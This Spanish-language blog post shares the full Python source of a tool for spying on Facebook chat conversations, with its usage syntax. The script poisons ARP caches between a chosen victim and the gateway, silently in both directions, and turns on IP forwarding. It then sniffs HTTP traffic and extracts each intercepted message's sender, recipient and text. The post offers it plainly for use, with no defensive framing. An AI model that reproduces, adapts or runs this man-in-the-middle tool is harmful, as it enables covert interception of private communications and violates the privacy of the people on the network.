Una vez instalado esta, podran usar dicha herramienta!!
Este es el source de la tool,
AQUI:
#!/usr/bin/env python
#-*-encoding:utf8-*-
""" 2011 vdo.pure at gmail.com"""
''' Traducido por ZtuX... secret.user8[at]gmail[dot].com'''
"""
Este programa es software libre: Usted puede redistribuirlo y / o modificar
bajo los términos de la licencia GNU General Public License publicada por
la Free Software Foundation, bien de la versión 3 de la Licencia, o
(a su elección) cualquier versión posterior.
Este programa se distribuye con la esperanza de que sea útil,
pero SIN NINGUNA GARANTÍA, incluso sin la garantía implícita de
COMERCIALIZACIÓN o IDONEIDAD PARA UN PROPÓSITO PARTICULAR. Consulte la
Licencia Pública General GNU para más detalles.
Usted debería haber recibido una copia de la Licencia Pública General GNU
junto con este programa. Si no, vaya a http://www.gnu.org/licenses/>.
"""
import sys, os
import dpkt, pcap
def check_root():
""" Devuelve Verdadero (True) si el usuario es root, de lo contrario Falso (False) """
if os.getenv('LOGNAME','none').lower() == 'root':
return True
return False
def poison(iface,victim, gw):
""" IP Forwarding """
os.system("sysctl -w .net.ipv4.ip_forward=1 > /dev/null")
""" ARP cache poisoning, silent, in both directions """
os.system("arpspoof -i "+iface+" -t "+victim+" "+gw+" 2> /dev/null &")
os.system("arpspoof -i "+iface+" -t "+gw+" "+victim+" 2> /dev/null &")
print("Envenenamiento de Cache ARP...")
def fbchatgrep(p,pid):
data = str(p.data)
if ("{\"t\":\"msg") and ("\"type\":\"msg\"") in data:
msgid=data[data.find("\"msgID\":")+9:data.rfind("\"},\"from\":")]
if (pid != msgid ): #Comprobar si el mensaje apareció antes (ARP poison clones)
pid = msgid
print(" ")
s = "Mensaje de: "+data[data.find("from_name\":\"")+12:data.rfind("\",\"from_first_name")]
print(unicode(s,'unicode_escape').encode('utf-8'))
s = "Para: "+data[data.find("to_name\":\"")+10:data.rfind("\",\"to_first_name")]
print(unicode(s,'unicode_escape').encode('utf-8'))
s = data[data.find("\"text\":")+8:data.rfind(",\"time\"")-1]
print(unicode(s,'unicode_escape').encode('utf-8'))
print(" ")
return pid
if __name__ == '__main__':
if len(sys.argv) < 4:
print '''Traducido por ZtuX... Visita http://mundohacking.com
Para usar siga esta Sintaxis: ./sniff.py [intefaz] [victima] [gateway]
Ejemplo: ./sniff.py eth0 192.168.1.2 192.168.1.254'''
sys.exit(0)
if not check_root():
print 'Debes ser SuperUsuario'
sys.exit(1)
pid="fo bar"
pc = pcap.pcap(sys.argv[1])
pc.setfilter('tcp and port 80') #Sniff only http
try:
print 'Escuchando en: %s' % (pc.name)
print 'Para Salir teclea: Control+C'
poison(sys.argv[1],sys.argv[2],sys.argv[3])
for ts, pkt in pc:
packet = dpkt.ethernet.Ethernet(pkt)
pid = fbchatgrep(packet,pid)
except KeyboardInterrupt:
os.system("sysctl -w .net.ipv4.ip_forward=0 > /dev/null") # Deshabilitar IP Delantera
nrecv, ndrop, nifdrop = pc.stats()
print '\n%d packets received by filter' % nrecv
print '%d packets dropped by kernel' % ndrop
Comments
0 Response to 'Espiar conversaciones de Facebook'
Publicar un comentario